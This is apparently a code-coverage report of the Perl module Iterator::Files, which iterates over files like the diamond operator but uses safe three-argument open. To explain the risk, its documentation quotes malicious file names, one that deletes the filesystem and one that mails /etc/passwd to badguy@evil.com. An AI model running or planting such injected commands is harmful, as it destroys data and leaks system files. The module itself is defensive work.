File Coverage

blib/lib/Iterator/Files.pm
Criterion Covered Total %
statement 92 95 96.8
branch 43 54 79.6
condition 11 15 73.3
subroutine 13 13 100.0
pod 5 6 83.3
total 164 183 89.6


line stmt bran cond sub pod time code
1             #! perl
2              
3             package Iterator::Files;
4              
5 11     11   63723 use warnings;
  11         28  
  11         309  
6 11     11   54 use strict;
  11         23  
  11         172  
7 11     11   46 use Carp;
  11         18  
  11         5097  
8              
9             =head1 NAME
10            
11             Iterator::Files - Iterate through the contents of a list of files
12            
13             =cut
14              
15             our $VERSION = '1.00';
16             $VERSION =~ tr/_//d;
17              
18             =head1 SYNOPSIS
19            
20             use Iterator::Files;
21            
22             $input = Iterator::Files->new( files => [ "foo", "bar" ] );
23             while ( <$input> ) {
24             ...
25             warn("current file = ", $it->current_file, "\n");
26             }
27            
28             # Alternatively:
29             while ( $input->has_next ) {
30             $line = $input->next;
31             ...
32             }
33            
34             =head1 DESCRIPTION
35            
36             Iterator::Files can be used to retrieve the contents of a series of
37             files as if it were one big file, in the style of the C<< <> >>
38             (Diamond) operator.
39            
40             Just like C<< <> >> it returns the records of all files, one by one,
41             as if it were one big happy file. In-place editing of files is also
42             supported..
43            
44             As opposed to the built-in C<< <> >> operator, no magic is applied to
45             the file names unless explicitly requested. This means that you're
46             protected from file names that may wreak havoc to your system when
47             processed through the magic of the two-argument open() that Perl
48             normally uses for C<< <> >>.
49            
50             Iterator::Files is part of the Iterator-Diamond package.
51            
52             =head1 RATIONALE
53            
54             Perl has two forms of open(), one with 2 arguments and one with 3 (or
55             more) arguments.
56            
57             The 2-argument open is magical. It opens a file for reading or writing
58             according to a leading '<' or '>', strips leading and trailing
59             whitespace, starts programs and reads their output, or writes to their
60             input. A filename '-' is taken to be the standard input or output of
61             the program, depending on whether the file is opened for reading or
62             writing.
63            
64             The 3-argument open is strict. The second argument designates the way
65             the file should be opened, and the third argument contains the file
66             name, taken literally.
67            
68             Many programs read a series of files whose names are passed as command
69             line argument. The diamond operator makes this very easy:
70            
71             while ( <> ) {
72             ....
73             }
74            
75             The program can then be run as something like
76            
77             myprog *.txt
78            
79             Internally, Perl uses the 2-argument open for this.
80            
81             What's wrong with that?
82            
83             Well, this goes horribly wrong if you have file names that trigger the
84             magic of Perl's 2-argument open.
85            
86             For example, if you have a file named ' foo.txt' (note the leading
87             space), running
88            
89             myprog *.txt
90            
91             will surprise you with the error message
92            
93             Can't open foo.txt: No such file or directory
94            
95             This is still reasonably harmless. But what if you have a file
96             '>bar.txt'? Now, silently a new file 'bar.txt' is created. If you're
97             lucky, that is. It can also silently wipe out valuable data.
98            
99             When your system administrator runs scripts like this, malicous file
100             names like 'rm -fr / |' or '|mail < /etc/passwd badguy@evil.com' can
101             be a severe threat to your system.
102            
103             After a long discussion on the perl mailing list it was felt that this
104             security hole should be fixed. Iterator::Files does this by
105             providing a decent iterator that behaves just like C<< <> >>, but with
106             safe semantics.
107            
108             =head1 FUNCTIONS
109            
110             =head2 new
111            
112             Constructor. Creates a new iterator.
113            
114             The iterator can be used by calling its methods, but it can also be
115             used as argument to the readline operator. See the examples in
116             L<SYNOPSIS>.
117            
118             B<new> takes an optional series of key/value pairs to control the
119             exact way the iterator must behave.
120            
121             =over 4
122            
123             =item B<< magic => >> { none | stdin | all }
124            
125             C<none> applies three-argument open semantics to all file names and do
126             not use any magic. This is the default behaviour.
127            
128             C<stdin> is also safe. It applies three-argument open semantics but
129             allows a file name consisting of a single dash C<< - >> to mean the
130             standard input of the program. This is often very convenient.
131            
132             C<all> applies two-argument open semantics. This makes the iteration
133             unsafe again, just like the built-in C<< <> >> operator.
134            
135             =item B<< edit => >> I<suffix>
136            
137             Enables in-place editing of files, just as the built-in C<< <> >> operator.
138            
139             Unlike the built-in operator semantics, an empty suffix to discard backup
140             files is not supported.
141            
142             =item B<< files => >> I<aref>
143            
144             Use this list of files. If this is not specified, uses @ARGV.
145            
146             =back
147            
148             =cut
149              
150             sub new {
151 20     20 1 1568     my ($pkg, %args) = @_;
152 20         97     my $self = bless
153                   { _files => \@ARGV,
154             _magic => "none",
155             _init  => 0,
156                   }, $pkg;
157              
158 20 100       64     if ( exists $args{magic} ) {
159 3         103 $self->{_magic} = lc delete $args{magic};
160             croak($pkg."::new: Invalid value for 'magic' option")
161 3 50       28 unless $self->{_magic} =~ /^none|all|stdin$/;
162                 }
163 20 100       57     if ( exists $args{edit} ) {
164 3         53 $self->{_edit} = delete $args{edit};
165             croak($pkg."::new: Value for 'edit' option (backup suffix) may not be empty")
166 3 100 66     191 if defined($self->{_edit}) && $self->{_edit} eq '';
167                 }
168 19 50       53     if ( exists $args{files} ) {
169 19         106 $self->{_files} = delete $args{files};
170             croak($pkg."::new: Invalid value for 'files' option")
171 19 50       80 unless ref $self->{_files} eq 'ARRAY';
172 19         32 $self->{_user_files} = 1;
173                 }
174 19 50       45     if ( exists $args{record_separator} ) {
175 0         0 $self->{_recsep} = delete $args{record_separator};
176                 }
177 19 50       41     if ( exists $args{rs} ) {
178 0         0 $self->{_recsep} = delete $args{rs};
179                 }
180 19 100       34     if ( %args ) {
181 1         96 croak($pkg."::new: Unhandled options: "
182             . join(" ", sort keys %args));
183                 }
184              
185 18         31     $self->{_current_file} = \my $argv;
186              
187 18         83     return $self;
188             }
189              
190             =head2 next
191            
192             Method, no arguments.
193            
194             Returns the next record of the input stream, or undef if the stream is
195             exhausted.
196            
197             =cut
198              
199             sub next {
200 67     67 1 86     my $self = shift;
201              
202 67         79     while ( 1 ) {
203              
204 84 100       156 unless ( $self->{_init} ) {
205 33 100       93 return unless $self->_advance;
206             }
207              
208 68 50       122 if ( $self->{_init} ) {
209 68         395528 my $line = readline($self->{_current_fh});
210 68 100       219 return $line if defined $line;
211 17         63 close($self->{_current_fh});
212 17         102 undef($self->{_current_fh});
213 17         33 $self->{_init} = 0;
214 17         28 undef ${ $self->{_current_file} };
  17         50  
215             }
216                 }
217             }
218              
219             sub readline {
220 65 100   65 0 222     goto \&next unless wantarray;
221 2         4     my $self = shift;
222 2         3     my @lines;
223 2         6     while ( $self->has_next ) {
224 4         12 push(@lines, $self->next);
225                 }
226 2         7     return @lines;
227             }
228              
229             #### WARNING ####
230             # From overload.pm: Even in list context, the iterator is currently
231             # called only once and with scalar context.
232 11     11   9100 use overload '<>' => \&readline;
  11         8157  
  11         60  
233              
234             sub _magic_stdin {
235 1     1   3     my $self = shift;
236 1         6     my $magic = $self->{_magic};
237 1   33     11     return 'stdin' eq $magic || 'all' eq $magic;
238             }
239              
240             sub _advance {
241 39     39   60     my $self = shift;
242              
243 39         73     $self->{_init} = 1;
244              
245 39 100 100     116     if ( defined($self->{_edit}) && defined($self->{_rewrite_fh}) ) {
246             close($self->{_rewrite_fh})
247 2 50       42 or croak("Error rewriting ", $self->current_file, ": $!");
248 2         5 undef $self->{_rewrite_fh};
249 2         6 select($self->{_reset_fh});
250                 }
251              
252 39         57     while ( 1 ) {
253              
254 43 100       54 unless ( @{ $self->{_files} } ) {
  43         104  
255 18         53 return;
256             }
257              
258 25         32 ${$self->{_current_file}} = shift(@{ $self->{_files} });
  25         44  
  25         52  
259              
260 25 100 100     148 if ( $self->{_magic} eq 'all'
      66        
261             || $self->{_magic} eq 'stdin' && $self->current_file eq '-' ) {
262 3 50       27 open($self->{_current_fh}, $self->current_file)
263             or croak($self->current_file, ": $!");
264             }
265             else {
266 22 100       89 open($self->{_current_fh}, '<', $self->current_file)
267             or croak($self->current_file, ": $!");
268             }
269              
270 23 100       266 if ( eof($self->{_current_fh}) ) {
271 4         18 close $self->{_current_fh};
272 4         10 undef $self->{_current_fh};
273 4         6 undef ${ $self->{_current_file} };
  4         6  
274 4         7 CORE::next;
275             }
276              
277 19 100       59 if ( defined $self->{_edit} ) {
278 2         6 my $fname = $self->current_file;
279 2         2 my $backup = $fname;
280 2 50       9 if ( $self->{_edit} !~ /\*/ ) {
281 2         5 $backup .= $self->{_edit};
282             }
283             else {
284 0         0 $backup =~ s/\*/$fname/g;
285             }
286 2         9 unlink($backup);
287 2 50       1633 rename($fname, $backup)
288             or croak("Cannot rename $fname to $backup: $!");
289 2 50       88 open($self->{_rewrite_fh}, '>', $fname)
290             or croak("Cannot create $fname: $!");
291 2         14 $self->{_reset_fh} = select($self->{_rewrite_fh});
292             }
293              
294 19         74 return 1;
295                 }
296             }
297              
298             =head2 has_next
299            
300             Method, no arguments.
301            
302             Returns true if the stream is not exhausted. A subsequent call to
303             C<next> will return a defined value.
304            
305             This is the equivalent of the 'eof()' function.
306            
307             =cut
308              
309             sub has_next {
310 12     12 1 16     my $self = shift;
311 12 100       24     !$self->is_eof || $self->_advance;
312             }
313              
314 11     11   4521 use overload 'bool' => \&has_next;
  11         20  
  11         39  
315              
316             =head2 is_eof
317            
318             Method, no arguments.
319            
320             Returns true if the current file is exhausted. A subsequent call to
321             C<next> will open the next file if available and start reading it.
322            
323             This is the equivalent of the 'eof' function.
324            
325             =cut
326              
327             sub is_eof {
328 18     18 1 3598     my $fh = shift->{_current_fh};
329 18 100       118     !defined($fh) || eof($fh);
330             }
331              
332             =head2 current_file
333            
334             Method, no arguments.
335            
336             Returns the name of the current file being processed.
337            
338             =cut
339              
340             sub current_file {
341 36     36 1 1024     ${ shift->{_current_file} };
  36         737  
342             }
343              
344             =head1 LIMITATIONS
345            
346             Even in list context, the iterator C<< <$input> >> is currently called
347             only once and with scalar context. This will not work as expected:
348            
349             my @lines = <$input>;
350            
351             This reads all remaining lines:
352            
353             my @lines = $input->readline;
354            
355             =head1 SEE ALSO
356            
357             L<Iterator::Diamond>, open() in L<perlfun>, L<perlopentut>.
358            
359             =head1 AUTHOR
360            
361             Johan Vromans, C<< <jv at cpan.org> >>
362            
363             =head1 BUGS
364            
365             Please report any bugs or feature requests to C<bug-iterator-diamond
366             at rt.cpan.org>, or through the web interface at
367             L<http://rt.cpan.org/NoAuth/ReportBug.html?Queue=Iterator-Diamond>. I
368             will be notified, and then you'll automatically be notified of
369             progress on your bug as I make changes.
370            
371             =head1 SUPPORT
372            
373             You can find documentation for this module with the perldoc command.
374            
375             perldoc Iterator::Files
376            
377             You can also look for information at:
378            
379             =over 4
380            
381             =item * RT: CPAN's request tracker
382            
383             L<http://rt.cpan.org/NoAuth/Bugs.html?Dist=Iterator-Diamond>
384            
385             =item * CPAN Ratings
386            
387             L<http://cpanratings.perl.org/d/Iterator-Diamond>
388            
389             =item * Search CPAN
390            
391             L<http://search.cpan.org/dist/Iterator-Diamond>
392            
393             =back
394            
395             =head1 ACKNOWLEDGEMENTS
396            
397             This package was inspired by a most interesting discussion of the
398             perl5-porters mailing list, July 2008, on the topic of the unsafeness
399             of two-argument open() and its use in the C<< <> >> operator.
400            
401             =head1 COPYRIGHT & LICENSE
402            
403             Copyright 2016,2008 Johan Vromans, all rights reserved.
404            
405             This program is free software; you can redistribute it and/or modify it
406             under the same terms as Perl itself.
407            
408             =cut
409              
410             1; # End of Iterator::Files
411              
412             __END__
413